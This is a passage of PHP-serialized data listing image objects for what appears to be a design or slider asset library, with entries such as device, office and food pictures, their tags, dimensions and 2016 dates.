13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:48;a:12:{s:2:\"id\";s:3:\"127\";s:6:\"handle\";s:20:\"object_dishrag_1.png\";s:4:\"name\";s:13:\"Dishrag Cloth\";s:4:\"tags\";a:0:{}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:49;a:12:{s:2:\"id\";s:3:\"126\";s:6:\"handle\";s:20:\"object_wacom_pen.png\";s:4:\"name\";s:17:\"Wacom Drawing Pen\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1060\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:50;a:12:{s:2:\"id\";s:3:\"125\";s:6:\"handle\";s:21:\"object_occulus_vr.png\";s:4:\"name\";s:23:\"Occulus Virtual Reality\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:51;a:12:{s:2:\"id\";s:3:\"124\";s:6:\"handle\";s:18:\"object_antenna.png\";s:4:\"name\";s:13:\"Antenna Radar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:52;a:12:{s:2:\"id\";s:3:\"123\";s:6:\"handle\";s:21:\"object_solarpanel.png\";s:4:\"name\";s:11:\"Solar Panel\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:53;a:12:{s:2:\"id\";s:3:\"122\";s:6:\"handle\";s:16:\"object_wacom.png\";s:4:\"name\";s:20:\"Wacom Drawing Tablet\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:54;a:12:{s:2:\"id\";s:3:\"121\";s:6:\"handle\";s:18:\"object_earth_2.png\";s:4:\"name\";s:20:\"Earth Globe Planet 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:55;a:12:{s:2:\"id\";s:3:\"120\";s:6:\"handle\";s:18:\"object_chair_1.png\";s:4:\"name\";s:12:\"Office Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:56;a:12:{s:2:\"id\";s:3:\"119\";s:6:\"handle\";s:24:\"object_windturbine_2.png\";s:4:\"name\";s:14:\"Wind Turbine 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:57;a:12:{s:2:\"id\";s:3:\"118\";s:6:\"handle\";s:22:\"object_windturbine.png\";s:4:\"name\";s:12:\"Wind Turbine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:58;a:12:{s:2:\"id\";s:3:\"117\";s:6:\"handle\";s:16:\"object_earth.png\";s:4:\"name\";s:18:\"Earth Globe Planet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:59;a:12:{s:2:\"id\";s:2:\"88\";s:6:\"handle\";s:24:\"object_eiffeltower_2.png\";s:4:\"name\";s:13:\"Eiffeltower 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:60;a:12:{s:2:\"id\";s:2:\"87\";s:6:\"handle\";s:21:\"object_notebook_1.png\";s:4:\"name\";s:11:\"Notebook PC\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:61;a:12:{s:2:\"id\";s:2:\"86\";s:6:\"handle\";s:20:\"object_macbook_1.png\";s:4:\"name\";s:20:\"Apple Macbook Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:62;a:12:{s:2:\"id\";s:2:\"85\";s:6:\"handle\";s:18:\"object_canon_2.png\";s:4:\"name\";s:21:\"Canon Camera DSLR Top\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:63;a:12:{s:2:\"id\";s:2:\"84\";s:6:\"handle\";s:19:\"object_iphone_3.png\";s:4:\"name\";s:25:\"Apple iPhone Silver White\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:64;a:12:{s:2:\"id\";s:2:\"83\";s:6:\"handle\";s:18:\"object_candy_2.png\";s:4:\"name\";s:15:\"Candy Colored 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:65;a:12:{s:2:\"id\";s:2:\"82\";s:6:\"handle\";s:21:\"object_macmouse_1.png\";s:4:\"name\";s:15:\"Apple Mac Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:66;a:12:{s:2:\"id\";s:2:\"81\";s:6:\"handle\";s:19:\"object_iphone_1.png\";s:4:\"name\";s:18:\"Apple iPhone Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:67;a:12:{s:2:\"id\";s:2:\"80\";s:6:\"handle\";s:17:\"object_deco_1.png\";s:4:\"name\";s:17:\"White Deco Object\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:68;a:12:{s:2:\"id\";s:2:\"79\";s:6:\"handle\";s:23:\"object_applewatch_1.png\";s:4:\"name\";s:24:\"Apple Watch White Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:69;a:12:{s:2:\"id\";s:2:\"78\";s:6:\"handle\";s:23:\"object_swissknife_1.png\";s:4:\"name\";s:11:\"Swiss Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:70;a:12:{s:2:\"id\";s:2:\"77\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:86;a:12:{s:2:\"id\";s:2:\"49\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:87;a:12:{s:2:\"id\";s:2:\"48\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:88;a:12:{s:2:\"id\";s:2:\"47\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 